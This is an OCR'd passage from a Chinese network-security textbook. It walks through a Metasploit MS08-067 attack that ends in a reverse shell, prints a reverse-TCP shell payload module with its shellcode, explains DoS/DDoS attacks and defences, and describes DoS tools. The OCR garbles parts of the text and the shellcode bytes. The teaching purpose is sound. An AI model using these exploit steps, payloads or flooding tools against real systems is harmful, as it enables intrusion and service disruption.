


图 5-60 显示 模块 所 需 参数 


(4) 设置 相应 的 必 选 参数 值 , 使 用 “set” 或 “setg”, 并 设置 破解 程序 使 用 的 Payload, 以 
及 Payload 对 应 的 参数 : 

。 set RHOST 192. 168. 1.103 // 设 置 目 标 系统 IP 

。， set PAYLOAD windows/ meterpreter/ reverse_tcp 设置 Paylaod 的 具体 模块 名 


set LHOST 192. 168. 1. 106 reverset_tcp Payload 所 需 的 攻击 者 IP 


。 set LPORT 873 /reverset_tcp Payload 所 需 的 攻击 者 监听 端口 

。 set TARGET 34 为 Exploit 模块 指明 具体 的 目标 操作 系统 编号 

(5) 检查 是 否 已 经 设置 好 相应 参数 (图 5-61). 

(6) 执行 破解 程序 发 起 攻击 ,并 获得 反 向 连接 的 命令 行 shell( 图 5-62)。 

Metasploit 平台 提供 许多 Payload, 支持 攻击 者 自行 组 合 各 种 shellcode, 使 用 Ruby 
语言 编写 。 攻 击 者 可 以 使 用 msfvenom 生成 定制 的 多 态 载荷 ,装载 进 破 解 程序 。 一 个 简 








@@ 破解 程序 的 默认 路 径 是 /usr/share/metasploit-framework/modules/exploits/windows/smb/ms08 _ 067 _ 


netapi. rb。 





图 5-61 检查 设置 后 的 参数 值 


192. 168. 1. 106: 873 
ulnerability, 
o 192. 168. 1. 103 
TEETT0T0 st 20 


Xp [3 5.1 
C) 0000 1985- 2001 Mi ft 


k: \WIN 


图 5 





发 起 攻击 并 获得 远程 shell 


单 的 Payload, 路 径 是 “/usr/share/metasploit-{framework/modules/payloads/ 


windows/shell_reverse_tcp. rb”, 如 图 5-63 所 示 
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ngles/ 





i 

# This module requires Metasploit: http://metasploit.com/download 
# Current source: https://github.com/rapid7/metasploit-framework 
## 

require 'msf/core’ 

require 'msf/core/handler/reverse_tcp' 

require 'msf/base/sessions/command_shell' 

require 'msf/base/sessions/command_shell_options' 

module Metasploit3 


CachedSize 

















图 5-63 ”Payload 示例 代码 
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def initialize(info = 他) 
super(merge_info(info, 
"Name' 一 "Windows Command Shell, Reverse TCP Inline', 
'Description' => 'Connect back to attacker and spawn a command shell', 
"Author => ['vlad902", sf ], 
"License' => MSF_LICENSE, 





"Platform' => "win', 
'Arch' => ARCH X86, 
'Handler => Msf::Handler::ReverseTcp, 
'Session' => Msf::Sessions::CommandShell, 
"Payload' => 
{ 
'Offsets' => 


{ 

LPORT ”一 [197.m ], 

'LHOST' =>[190,'ADDR'], 
'EXITFUNC' => [ 294,'V， J], 


}， 

'Payload' => // 可 以 使 用 msfvenom 进 行 多 态 变 形 
"\xFC\xE8\x82\x00\xO00\WxO0\Wx60\x89\xES\x31\xCO\x64\x8B\x50\x30\x8B" + 
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\WxOF \xB7T\x4A\x26\x31\xFF \xXAC\Wx3C" + 
"\x61\x7C\x02\x2C\x20\xC1\xCF \xOD\xO1\xCT\xE2\xF2\x52\x57\x8B\x52" + 
"\x10\Wx8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" + 
"\xO1l\xwD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\xO1\xD6\x31\xFF \xAC" + 
"\xCl1\xCF \xOD\xO1\xC7\x38\xEO\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" + 
"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\xOC\x4B\x8B\x58\x1C\xO01\xD3" + 
"\x8B\x04\x8B\xO1\xDO\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" + 
"\xEO\xSF \xSF \x5A\x8B\x12\xEB\x8D\x5D\x68\x33\x32\x00\xO0\x68\x77" + 
"\x73\x32\x5F \x54\x68\x4C\x77\x26\x07\xFF \xD5\xB8\x90\x01\x00\x00" + 
"\x29\xC4\x54\x50\x68\x29\x80\x6B\xO0\xFF \xD5\x50\x5O\x50\x50\x40" + 
"\x50\Wx40\x50\x68\xEA\xOF \xDF \xEO\xFF \xD5\x97\x6A\x05\x68\x7F\x00" + 
"\xOO\WxO1\x68\x02\x00\x1 1\x5C\x89\xE6\x6A\x10\x56\x57\x68\x99\XAS" + 
"\x74\x61\xFF \xD5\x85\xCO\Wx74\x0C\xFF \x4E\x08\x75\xEC\x68\xFO\xBS5" + 
"\xA2\x56\xFF \xD5\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31\xF6" + 
"\x6A\x12\x59\x56\xE2\xFD\x66\xC7T\x44\x24\x3C\xO1\x01\x8D\x44\x24" + 
"\x10\xCO6\WxO0\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53\x56" + 
"\x68\x79\xCC\x3F \x86\xFF \xD5\x89\xEO\x4E\x56\x46\xFF \x30\x68\x08" + 
"\x87\x1D\x60\xFF \xD5\xBB\xEO\x1D\x2A\xOA\x68\xA6\x95\xBD\x9D\xFF" + 
"\xD5\x3C\Wx06\x7C\xO0A\x80\xFB\xEO\x75\x05\xBB\x47\x13\x72\x6F \x6A" + 
" \xO0Wx53\xFF \xD5" 


) 


end 








图 5-63 ( 续 ) 


5.5 拒绝 服务 攻击 


拒绝 服务 (DoS) 指 攻击 者 利用 系统 及 协议 漏洞 大 量 消耗 网 络 带宽 及 系统 资源 ,使 得 
合法 系统 用 户 无 法 及 时 得 到 服务 和 系统 资源 。 
5.5.1 攻击 原理 


常见 的 DoS 攻击 分 为 带宽 攻击 协议 攻击 和 逻辑 攻击 。 
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1. 带宽 攻击 


带宽 攻击 是 最 常见 的 DoS 攻击 。 攻 击 者 使 用 大 量 垃 圾 数据 流 填充 目标 的 网 络 链 路 ， 
目标 网 络 设备 如 果 不 能 及 时 处 理发 送 给 它 的 大 量 流量 ,就 会 导致 响应 速度 变 慢 甚 至 系统 
崩溃 ,进而 停止 服务 。 攻 击 流量 可 以 是 基于 TCP、UDP 或 ICMP 协议 的 报 文 。 目 标 设备 
或 系统 可 能 存在 硬件 或 软件 的 限制 ,因此 服务 器 或 者 网 络 设备 通常 都 会 配置 吞吐 量 的 限 
制 ,此 时 攻击 者 只 需要 短 时 间 内 发 送 大 量 小 的 报 文 就 可 能 达到 目标 设置 的 吞吐 量 限制 ,而 
不 需要 发 送 过 多 的 报 文 去 填 满 带宽 。 

带宽 攻击 的 例子 包括 UDP 洪水 (flooding) .Smurf 攻击 和 Fraggle 攻击 等 。UDP 洪 
水 指向 目标 的 指定 UDP 端口 发 送 大 量 无 用 UDP 报 文 以 占 满目 标 带 宽 , 目标 系统 接收 到 
UDP 报 文 时 ,会 确定 目的 端口 对 应 的 进程 ,如 果 该 端口 未 打开 ,系统 会 生成 “ICMP 端口 
不 可 达 ? 报 文 发 送 给 源 地 址 。 当 攻击 者 短 时 间 向 目标 端口 发 送 海量 报 文 时 ,目标 系统 很 可 
能 会 瘫痪 。 

Smurf 攻击 指 攻 击 者 伪造 并 发 送 大 量 源 IP 地 址 为 受害 主机 IP 地 址 ,目标 地 址 为 广 
播 地 址 的 ICMP Echo 请 求 报 文 , 当 网 络 中 的 每 台 主 机 接收 该 报 文 时 ,都 会 向 受害 主机 的 
IP 地 址 发 送 ICMP Echo 应 答 报 文 , 使 得 受害 主机 短 时 间 内 收 到 大 量 ICMP 报 文 , 从 而 导 

Fraggle 攻击 是 Smurf 的 变形 , 它 使 用 UDP 应 答 而 不 是 ICMP 报 文 ,基于 UDP 的 
Chargen 或 Echo 协议 实现 ,它们 分 别 使 用 UDP 端口 19 和 7, 当 攻击 者 向 网 络 中 的 所 有 
主机 发 送 目标 端口 是 19 或 7 的 UDP 请 求 报 文 时 ,开启 Chargen 和 Echo 服务 的 主机 会 
发 送 应 答 给 报 文 的 源 地 址 ,从 而 可 能 造成 源 地 址 主机 的 带宽 被 耗 尽 。 

2. 协议 攻击 

协议 攻击 指 利用 网 络 协议 的 设计 和 实现 漏洞 进行 的 攻击 ,典型 实例 包括 SYN 洪水 
攻击 , 泪 滴 攻 击 (Tear Drop) 死亡 之 Ping(Ping of Death) 和 Land 攻击 等 。 

SYN 洪水 攻击 利用 TCP 协议 的 设计 缺陷 ,发 送 大 量 伪 造 的 TCP 连接 请 求 ,使 得 目 
标 主机 用 于 处 理 三 路 握手 连接 的 内 存 资源 耗 尽 ,从 而 停止 TCP 服务 。 在 此 攻击 中 ,攻击 
者 伪造 不 同 源 地 址 发 送 多 个 同步 连接 请 求 报 文 , 目 标 主 机 在 发 送 同步 连接 应 答 报 文 后 ,由 
于 源 地 址 是 伪造 的 ,目标 主机 无 法 收 到 三 路 握手 的 最 后 确认 报 文 ,使 得 TCP 连接 无 法 正 
确 建立 。 目 标 主机 通常 会 等 待 75s 左右 才 会 丢弃 这 个 未 完成 的 连接 , 当 攻 击 者 持续 不 断 
发 送 伪造 的 连接 请 求 报 文 时 ,目标 主机 的 内 存 会 被 这 些 未 完成 的 连接 填 满 ,从 而 无 法 响应 
合法 用 户 的 正常 连接 请 求 , 导 致 服务 停止 。 

Tear Drop 利用 IP 协议 有 关 分 片 的 实现 漏洞 ,向 目标 主机 发 送 分 成 若干 不 同 分 片 的 
IP 报 文 ,但 是 不 同 分 片 之 间 有 重 琶 ,如 果 目 标 系统 无 法 正确 识别 此 类 畸形 分 片 , 在 重组 这 
些 分 片 时 容易 发 生 错 误导 致 系统 崩溃 ,从 而 停止 服务 。 

死亡 之 Ping 指 早 期 操作 系统 在 实现 TCP/IP 协议 栈 时 ,对 报 文大 小 超过 64K 字 节 的 
异常 情况 没有 处 理 。IP 报 文 在 进行 分 片 组 合 后 ,重组 后 的 IP 报 文 的 总 长 度 只 有 在 所 有 
分 片 都 接收 完毕 之 后 才能 确定 ,而 早期 协议 实现 时 报 文 的 重组 代码 所 分 配 的 内 存 区 域 最 
大 不 超过 64K 字 节 。 当 重组 完毕 后 出 现 超出 64K 字 节 的 报 文 , 其 中 的 额外 数据 就 会 被 写 
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入 其 他 内 存 区 域 , 从 而 产生 一 种 典型 的 缓冲 区 溢出 攻击 。 由 于 使 用 ping 工具 很 容易 完成 
这 种 攻击 ,如 “ping -1 65560 -t” ,所 以 称 为 "Ping of Death”。 

Land 攻击 指 构造 特殊 的 SYN 握手 报 文 ,将 报 文 源 地 址 和 目标 地 址 都 设置 为 目标 主 
机 地 址 ,而 且 源 端口 设置 为 与 目标 端口 相同 ,使 得 目标 主机 向 自身 发 送 第 二 路 连接 握手 报 
文 , 并 造成 目标 主机 的 连接 管理 混乱 ,最 终 使 目标 系统 瘫痪 。 

3. 逻辑 攻击 

逻辑 攻击 利用 目标 系统 或 服务 程序 的 实现 漏洞 发 起 攻击 ,如 早期 的 “红色 代码 ”和 
Nimda 蠕虫 ,就 是 利用 Windows 2003 的 RPC 服务 实现 漏洞 发 起 的 大 规模 拒绝 服务 攻 
击 ,主要 消耗 目标 的 CPU 和 内 存 资源 。 如 2015 年 发 现 的 BIND 开源 DNS 服务 器 程序 漏 
洞 (CVE-2015-5477) ,攻击 者 通过 发 起 畸形 的 TKEY 查询 ,可 对 DNS 服务 器 造成 DoS 
攻击 。 

DoS 攻击 与 其 他 攻击 相 比 ,具有 如 下 特点 : 

(1) 较 难 确认 。 合 法 用 户 在 无 法 获得 服务 时 ,通常 会 认为 是 服务 器 因 故障 短暂 失效 ， 
不 会 认为 是 受到 攻击 。 

(2) 十 分 隐蔽 。Dos 攻击 往往 隐藏 在 正常 的 访问 请 求 中 ,如 带宽 攻击 和 协议 攻击 , 因 
此 很 难 被 发 现 。 

(3) 资源 限制 。DoS 攻击 目标 是 占用 系统 资源 ,而 系统 资源 都 是 有 限 的 ,因此 占用 资 
源 容易 实现 。 

DoS 攻击 通常 比较 难于 追踪 攻击 者 ,但 可 以 从 目标 主机 着 手 ,通过 以 下 症状 来 初步 判 
断 是 否 发 生 DoS 攻击 : 

(1) 监测 到 短 时 间 内 出 现 大 量 报 文 。 

(2) CPU 利用 率 突然 提高 。 

(3) 主机 长 时 间 无 响应 。 

(4) 主机 随机 崩溃 。 

Dos 的 防御 目前 只 有 有 效 的 检测 手段 ,没有 特别 有 效 的 防范 措施 和 解决 方案 ,通常 综 
合 使 用 多 种 网 络 安全 专用 设备 和 工具 组 成 防御 体系 .其 中 包括 防火 墙 、 基 于 主机 的 入 侵 检 
测 系统 、 基 于 特征 的 网 络 入 侵 检 测 系 统 和 网 络 异常 行为 检测 器 等 。 


5.5.2 DDoS 原理 


单一 的 DoS 攻击 是 采用 一 对 一 的 方式 , 当 攻 击 目 标的 CPU 速度 、 内 存 或 网 络 带 宽 等 
指标 不 高 时 ,攻击 效果 比较 明显 。 如 果 目 标 是 大 型 服务 器 ,如 商业 Web 服务 器 或 DNS 服 
务 器 ,那么 使 用 一 台 机 器 进行 DoS 攻击 很 难 达 到 目标 。DDoS 使 用 客户 /服务 器 (C/S) 模 
式 , 同 时 操纵 多 台 主 机 向 目标 发 起 攻击 , 当 同 时 发 起 攻击 的 主机 数量 较 大 时 , 受 攻击 的 目 
标 主机 资源 会 很 快 耗 尽 , 无 法 提供 服务 。DDoS 是 实施 最 快 、 攻 击 能 力 最 强 并 且 破 坏 性 最 
大 的 攻击 方式 。 

在 DDoS 攻击 体系 中 通常 包含 三 种 角色 (图 5-64)。 

(1) 攻击 者 : 他 使 用 一 台 主 机 作为 主 控制 平台 ,操作 整个 攻击 过 程 ,并 向 主 控 端 发 送 
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图 5-64 DDoS 攻击 体系 


攻击 命令 。 

(2) 主 控 端 : 攻击 者 预先 控制 的 一 些 主机 ,同时 这 些 主机 可 以 控制 其 他 代理 主机 , 主 
控 端 负责 接收 攻击 者 发 送 的 攻击 指令 ,并 分 发 到 它 控制 的 代理 主机 。 

(3) 代理 端 : 也 是 攻击 者 预先 控制 的 主机 ,负责 运行 攻击 程序 ,接收 主 控 端 转发 的 指 
令 , 它 是 攻击 的 执行 者 。 

所 以 要 实施 一 次 DDoS 攻击 ,最 重要 的 是 控制 足够 多 的 主 控 端 和 代理 端 。 攻 击 者 必 
须 利 用 5.1 节 一 5.4 节 中 提 到 的 各 种 攻击 方法 有 效 获 取 网 络 主机 的 系统 控制 权 , 并 且 在 
这 些 主机 上 隐 项 安装 后 门 程序 和 DoS 攻击 程序 , 当 攻 击 者 发 起 DDoS 攻击 时 ,只 需要 在 
幕后 调 遗 主 控 端 和 代理 端 发 起 攻击 即 可 ,攻击 者 的 身份 很 难 暴 露 。 一 次 成 功 的 DDoS 攻 
击 往往 需要 成 百 上 千 台 网 络 主机 参与 ,这 些 主 机 称 为 “僵尸 网 络 ”, 因 为 它们 受 攻击 者 控 
制 ,行动 十 分 统一 。 

当前 ,对 于 DDoS 攻击 的 防御 主要 从 两 方面 展开 ,一 是 从 基础 设施 的 改进 来 缓解 攻 
击 ,如 增加 带宽 .增强 CPU 性 能 .采用 合理 的 网 络 部 署 结构 等 ; 二 是 网 络 边界 采用 专用 的 
DDoS 检测 和 防御 技术 。 检 测 和 防御 DDoS 较为 有 效 的 方法 主要 有 如 下 几 类 ， 

1. 动态 挑战 算法 

防御 工具 对 传输 层 和 应 用 层 协议 栈 行为 进行 模拟 ,作为 目标 主机 和 攻击 主机 之 间 的 
代理 ,对 客户 端 发 送 挑战 报 文 ,只 有 完成 挑战 认证 的 报 文才 允许 访问 真正 的 目标 主机 。 常 
用 的 动态 挑战 算法 有 SYN Cookie 技术 和 DNS Cookie 技术 。 

2. 多 层次 限 速 

从 不 同 粒度 和 不 同 协议 层次 ,对 IP 报 文 的 吞吐 量 进行 限制 ,如 基于 源 IP 或 目标 IP、 
基于 传输 层 和 应 用 层 协议 ,这 是 对 带宽 型 攻击 常用 的 防护 方法 ,用 于 抵御 SYN 洪水 、 
UDP Flood 和 ICMP Flood, 
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3. 访问 控制 

实现 网 络 层 \ 传 输 层 和 应 用 层 等 各 个 层次 的 不 同 访问 控制 策略 。 如 对 于 HTTP 协 
议 , 可 以 对 报 文 的 URL、user-agent 和 Cookie 等 参数 设置 不 同 策略 决定 对 具体 报 文 是 丢 
弃 、 限 速 还 是 允许 ; 对 于 DNS 协议 ,可 以 对 DNS 查询 的 名 字 、 类 型 `RR 记录 设置 相关 
策略 。 

4. 行为 分 析 和 信誉 机 制 

基于 数据 分 析 技 术 对 IP 报 文 的 行为 和 特征 建 模 分 析 , 建 立 通用 特征 库 , 包 括 IP、 
URL 和 上 传 下 载 的 文件 信息 ,提取 可 疑 报 文 的 特征 指纹 ,从 而 在 网 络 边界 自动 检测 并 丢 
弃 可 疑 的 DDoS 攻击 报 文 , 此 类 技术 对 于 僵尸 网 络 的 防御 较为 有 效 。 











5.5.3 DoS/DDoS 工具 


在 DDoS 攻击 中 ,攻击 工具 扮演 着 重要 的 角色 ,因为 DDoS 攻击 都 是 依靠 攻击 工具 来 
实施 的 。 本 节 列 出 一 些 常见 的 免费 DDoS 工具 ,并 介绍 其 所 属 攻击 类 型 以 及 攻击 实施 的 
方式 特点 等 。 

1. LOIC/XOIC 

LOIC? 是 一 款 简单 易 用 的 跨 平台 的 DoS/DDoS 攻击 工具 , 它 可 以 发 起 TCP、UDP、 
HTTP 请 求 洪 水 ,对 目标 主机 进行 带宽 攻击 ,攻击 者 可 以 改造 它 构建 僵尸 网 络 , 它 使 用 
C# 语 言 编写 ,拥有 图 形 界 面 ( 图 5-65)。 攻 击 方式 是 以 无 限 循环 方式 发 送 大 量 数 据 。 
XOIC( 图 5-66) 与 其 类 似 , 但 是 仅 适用 于 Win7/8, 它 相 比 LOIC 增加 一 个 主机 测试 功能 和 
ICMP 洪水 攻击 。 








i 喝 Low Orbit lon Cannon | When harpoons, air strikes and nukes fails | v. 1.0.8.0 
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图 5-65 LOIC 攻击 界面 


® https://sourceforge. net/projects/loic。 














图 5-66 XOIC 攻击 界面 


2. Hyenae 
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Hyenae2 是 一 个 强大 的 DDoS 工具 ,支持 Linux 和 Windows。 它 的 配置 选项 众多 ， 


可 以 灵活 指定 TCP/UDP/ICMP/DHCP/ARP/DNS 等 协议 头 


4 


部 参数 以 及 控制 发 包 速 率 ， 


图 形 界面 简单 易 用 。 如 图 5-67 所 示 ,对 “202. 101. 194. 149:80” 发 起 压力 测试 ,在 34s 内 





发 送 了 多 达 704 552 条 TCP 连接 请 
目标 和 源 的 IP、 端 口 和 MAC 地 址 。 


求 报 文 ,平均 每 秒 2 万 多 条 , 它 使 用 pattern 方式 设置 
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图 5-67 Hyenae 工具 的 图 形 前 端 


3. SlowHTTPTest 





SlowHTTPTest@ 是 一 款 支持 灵活 配置 的 HTTP 协议 攻击 工具 , 它 能 实现 在 较 低速 


四 ”https://sourceforge. net/projects/hyenae。 


回 https://github. com/shekyan/slowhttptest。 


NG 


网 络 攻防 技术 与 实战 一 一 深入 理解 信息 安全 防护 体系 





率 下 DoS 攻击 目标 Web 服务 器 ,主要 利用 HTTP 协议 的 一 个 特点 ,必须 接收 完整 的 
HTTP 报 文 后 服务 器 才 会 进行 处 理 。 如 果 一 个 HTTP 请 求 不 完整 ,服务 器 会 一 直 为 该 
请 求 保 留 资源 直到 它 传输 完毕 , 当 服 务 器 有 太 多 的 资源 都 处 于 等 待 状态 时 ,就 出 现 了 
DoS。 其 他 类 似 的 工具 包括 SlowlorisHeader、SlowHTTP POST SlowRead 等 

SlowlorisHeader 的 基本 原理 是 制造 不 完整 的 HTTP 请 求 头 部 ， -个 完整 的 请 求 头 
部 应 该 以 “0d0a0d0a” 结 束 , 但 是 攻击 工具 只 发 送 “0d0a”, 然 后 以 固定 的 时 间 间 隔 反 复发 送 
随机 的 “key-value” 键 值 对 ,迫使 服务 器 持续 等 待 直至 超时 。 最 终 通 过 不 持续 的 并 发 连接 
耗 尽 系统 的 最 大 连接 数 , 使 得 服务 端 停止 服务 。 

SlowRead 通过 调整 TCP 协议 头 部 中 的 window 字段 来 控制 服务 器 的 发 送 速率 , 尽 
可 能 长 地 保持 与 服务 器 单 次 连接 的 交互 时 间 直 至 超时 。 通 常 请 求 尽量 大 的 资源 ,并 将 自 
身 的 window 字段 设置 为 较 小 值 , 当 自身 接收 缓冲 区 被 来 自 服务 器 的 数据 填 满 后 ,会 发 出 
“TCP 零 接 收 窗口 ?报警 ,促使 服务 端 等 待 , 延 长 交互 时 间 。 

Slow HTTP POST 也 称 为 “Slow body”, 它 通过 POST 请 求 的 内 容 进行 攻击 ,在 这 种 
攻击 中 ,HTTP 请 求 的 头 部 已 经 完整 发 送 , 只 是 将 请 求 头 部 中 的 内 容 长 度 (content- 
人 置 为 一 个 很 大 的 值 , 同 时 不 在 一 个 TCP 报 文中 发 送 完整 POST 的 内 容 , 而 

是 每 隔 固定 时 间 发 送 随机 的 “key-value” 键 值 对 ,从 而 促使 服务 器 等 待 直 到 超时 。 

4. HULK/Goldeneye 

HULK® 是 一 个 不 错 的 DoS 攻击 Python 小 工具 ,构建 随机 的 HTTP 头 部 字段 进行 
HTTP 洪水 攻击 ,支持 多 线程 。GoldenEye( 图 5-68) 从 HULK 发 展 而 来 ,支持 多 平台 运 
行 ,攻击 方式 上 支持 HTTP GET .HTTP POST 和 随机 方式 。 它 通过 设置 Keep-Alive 和 
NoCache 字段 ,以 及 可 定义 的 User-Agent 值 来 绕 过 缓存 ,尽量 延长 与 目标 的 连接 时 间 ， 
以 消耗 目标 的 带宽 























尖 ./goLdeneye.py 
ast the URL 


orkers running onnections each 





图 5-68 ”Goldeneye 运行 示例 


DD https://github. com/jseidl/GoldenEye. 
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5. Torshammer 

Torshammer2 是 另 一 个 不 错 的 DoS 测试 工具 (图 5-69) ,用 Python 编写 ,主要 发 起 
SlowHTTPPOST 攻击 。 该 工具 十 分 有 效 ,通常 只 需要 一 台 机 器 启动 不 少 于 256 个 线程 
就 可 以 对 Apache 2. x 和 较 新 版 本 的 IIS 服务 器 发 起 有 效 的 DoS 攻击 。 它 还 有 一 个 额外 
的 优势 , 即 可 以 通过 TOR 匿名 网 络 执行 攻击 。 它 发 起 攻击 时 首先 向 目标 发 送 一 个 POST 
报 文 请 求 , 然 后 再 发 送 一 系列 随机 的 字符 串 , 但 是 把 这 些 随机 字符 串 分 为 多 个 TCP 报 文 
段 发 送 ,每 个 段 仅 仅 包含 两 个 字符 ,以 此 来 延长 HTTP 连接 的 时 间 并 消耗 目标 的 可 用 连 
接 数 。 








-/torshammer.py 





图 5-69 Torshammer 命令 行 示例 


6. PyLoris 

PyLoris2 是 一 个 测试 服务 器 的 脆弱 性 和 DoS 攻击 的 脚本 工具 ,用 Python 语言 编写 ， 
它 可 以 利用 Socks 代理 和 SSL 连接 ,并 可 以 针对 多 种 应 用 层 协 议 如 HTTP、FTP、SMTP、 
IMAP 和 远程 登录 等 协议 进行 攻击 。 它 的 HTTP 攻击 是 通过 SlowHTTP POST 进行 控 
制 ,可 以 自行 控制 POST 请 求 的 内 容 , 它 首先 和 服务 器 建立 连接 ,然后 将 POST 的 内 容 拆 
分 成 单个 字符 发 送 ,每 个 TCP 报 文 只 包含 一 个 字符 ,尽量 延长 与 服务 器 的 连接 时 间 。 
PyLoris 攻击 示例 见 图 5-70。 

7. Zarp 

Zarp3 是 采用 Python 编写 、 类 似 Metasploit 的 一 款 网 络 攻击 测试 框架 (图 5-71) , 采 
用 模块 化 设计 , 集 漏洞 扫描 、 嗅 探 .DDoS 压力 测试 于 一 身 。 它 的 主要 接口 是 一 个 命令 行 
驱动 的 图 形 界 面 , 采 用 多 层 菜单 ,使 用 起 来 相当 方便 ,只 适用 于 Linux 平台 ,目前 最 新 版 是 
i 











® https://sourceforge. net/projects/torshammer。 
©® https://sourceforge. net/projects/pyloris/ 。 
图 https://github. com/hatRiot/zarp。 
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oool Pytoris |o00. 
General 
Host: [oa nu.edu.cn 
Port: [80 
SSL 
Behavior 
Attack Limi (0 = No limit): 500 
Connection Limit (0 = Nolimi}: a I 
Thread Limit (0 = No limit); 1 
‘Connection speed (bytes/sec): 0.3 [Status— 


Target: oajxnu,edu.cn: 


Time between thread spawns (seconds): 0.3 
Attacks: 2 


ee 1 ec 
Close finished connections kn 


Stop Attack 





rory Usermame 
Proxy Password 











Launch 


图 5-70 ”PyLoris 攻击 示例 


# ./zarp.py 


[Version: 6.1,8] 


Poisoners [5] Parameter 
DoS Attacks [6] Services 
Sniffers [7] Attacks 

Scanners [8] Sessions 


[1] DHCP Starvation 

[2] LAND DoS 

[3] IPv6 Neighbor Discovery Protocol RA DoS 
[4] Nestea DoS 

[5] SWB2 DoS 

[6] TCP SYN 

[7] IPv6 Neighbor Unreachability Detection DoS 
[8] Linux 2.6.36 - 3.2,1 IGHP DoS 





图 5-71 Zarp 运行 主 界面 


5.6 小 结 





本 章 主要 介绍 口令 破解 .MITM 攻击 、 当 上 的 基 
本 原理 ,重点 给 出 了 一 些 常 见 工 具 的 攻击 方法 和 示例 

在 弱 口 令 扫 描 受 阻 的 情况 下 ,可 以 通过 网 络 监听 方式 截获 口令 密 文 ,然后 采用 字典 攻 
击 、 彩 虹 表 攻击 或 暴力 破解 方式 进行 口令 破解 ,经 典 工 具 包 括 Cain&Abel、 John the 
Ripper、Hashcat 等 ,而 Ophtcrack 和 RainbowCrack 特别 适合 于 彩虹 表 破 解 。 也 可 以 通 
过 社会 工程 学 方式 使 用 SET 工具 集 进行 钓鱼 欺骗 ,诱导 目标 输入 正确 的 口令 ,并 将 其 发 
给 攻击 者 。 

MITM 攻击 包括 数据 截获 和 欺骗 攻击 两 部 分 .数据 截获 方式 有 站 表 溢 出 .ARP 欺骗 、 
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DHCP 欺骗 .ICMP 重 定向 等 ,在 广域网 中 也 可 以 实施 路 由 欺骗 。 成 功 截获 用 户 数据 后 ， 
可 以 实施 的 欺骗 攻击 不 计 其 数 ,5. 2. 2 节 重 点 介绍 了 DNS 欺骗 和 几 种 基于 Web 的 欺骗 
方式 ; 重点 描述 如 何 使 用 Cain&Abel、 dnschef 和 Ettercap 实施 DNS 欺骗 ,如 何 使 用 
Burpsuip .mitmproxy\bdfproxy 进行 Web 欺骗 。 

恶意 代码 的 常用 技术 包括 生存 技术 和 隐蔽 技术 等 ,其 中 生存 技术 包括 反 调试 技术 、 压 
缩 、 加 密 、 多 态 和 变形 ,5. 3. 1 节 重 点 介绍 各 种 技术 的 基本 原理 ,以 及 如 何 使 用 upx 实现 代 
码 压缩 ,如 何 使 用 msfvenom 实施 多 态 变 形 。5. 3. 2 节 描 述 了 线程 注入 ,三 线程 技术 、 端 
口 复 用 和 反 向 端口 连接 等 常见 隐蔽 技术 ,以 及 如 何 使 用 msfvenom 构建 反 向 连接 的 恶意 
代码 。 另 外 ,以 * 上 兴 远 程控 制 ? 为 例 ,重点 说 明 恶 意 代 码 的 常见 功能 和 攻击 方式 。 

漏洞 可 以 按 多 种 方式 进行 分 类 ,5. 4. 1 节 重 点 介绍 按 技术 分 类 时 ,最 具 破 坏 力 的 各 种 
内 存 破坏 漏洞 的 产生 原理 ,以 程序 片段 的 方式 说 明 栈 溢出 、 堆 溢出 、 数 据 区 溢出 格式 串 漏 
洞 、 指 针 释 放 重用 和 二 次 释放 等 危险 漏洞 的 基本 原理 ,以 示例 方式 列举 一 些 常见 的 其 他 漏 
洞 , 如 逻辑 错误 漏洞 .输入 验证 漏洞 .设计 错误 漏洞 和 配置 错误 漏洞 等 。5. 4. 2 节 着 重 介 
绍 如 何 利用 缓冲 区 溢出 漏洞 实施 攻击 的 基本 原理 ,以 及 Shellcode 的 基本 概念 和 利用 方 
式 。5.4.3 节 详 细 介绍 漏洞 攻击 平台 Metasploit 的 基本 利用 方式 ,以 具体 实例 说 明 如 何 
利用 漏洞 破解 程序 实施 远程 攻击 。 

5. 5. 1 节 详 细 介 绍 三 种 主要 的 DoS 攻击 原理 ,包括 带宽 攻击 中 的 UDP 洪水 
(flooding)、Smurf 攻击 和 Fraggle 攻击 等 著名 攻击 的 基本 原理 ,利用 协议 设计 和 实现 漏 
洞 展 开 攻 击 的 SYN 洪水 、 泪 滴 攻 击 (Tear Drop) 死亡 之 Ping(Ping of Death) 和 Land 攻 
击 的 基本 原理 ,以 及 逮 辑 攻击 的 基本 原理 和 防范 措施 。5. 5. 2 节 详 细 描述 DDoS 的 原理 
并 介绍 一 般 的 防御 手段 ,如 动态 挑战 算法 、 限 速 .访问 控制 和 行为 分 析 等 。 

最 后 ,重点 列举 几 个 使 用 非常 广泛 的 DoS/DDoS 工具 ,重点 描述 它们 的 特点 、 攻 击 原 
理 和 使 用 方式 , 包括 LOIC/XOIC、Hyenae、SlowHttpTest、GoldenEye、 PyLoris、 
Torshammer 和 Zarp。 


习 题 


5-1 应 用 Cain&Abel 中 的 ARP 欺骗 和 破解 模块 ,尝试 截获 并 破解 局 域 网 中 某 台 主 
机 登录 某 服务 器 时 使 用 的 账号 和 口令 。 

5-2 练习 应 用 SET 工具 集 ,完成 模拟 某 真 实 网 站 主页 的 钓鱼 页 面 , 并 尝试 应 用 
Cain&.Abel 对 某 局 域 网 主机 展开 DNS 欺骗 ,对 其 实施 口令 钓鱼 。 

5-3 ”练习 在 Linux 下 应 用 arpspoof 完成 ARP 欺骗 ,并 结合 dnschef 和 Ettercap 完 
成 对 局 域 网 某 主机 的 DNS 欺骗 。 

5-4 假设 局 域 网 中 交换 机 没有 采用 信任 端口 机 制 , 练 习 在 局 域 网 中 展开 DHCP 欺 
骗 ,为 保证 成 功率 ,可 以 预先 对 真实 DHCP 服务 器 展开 DoS 攻击 。 

5-5 练习 使 用 BurpSuite 或 mitmproxy 修改 指定 URL 的 返回 页 面 ,对 于 其 他 请 求 
则 直接 转发 ,查看 当 它 们 分 别 工 作 在 正常 代理 和 透明 代理 方式 时 ,客户 端的 返回 结果 。 

5-6 学 会 使 用 msfvenom 生成 正 向 连接 和 反 向 连接 的 恶意 代码 ,并 尝试 生成 一 段 恶 
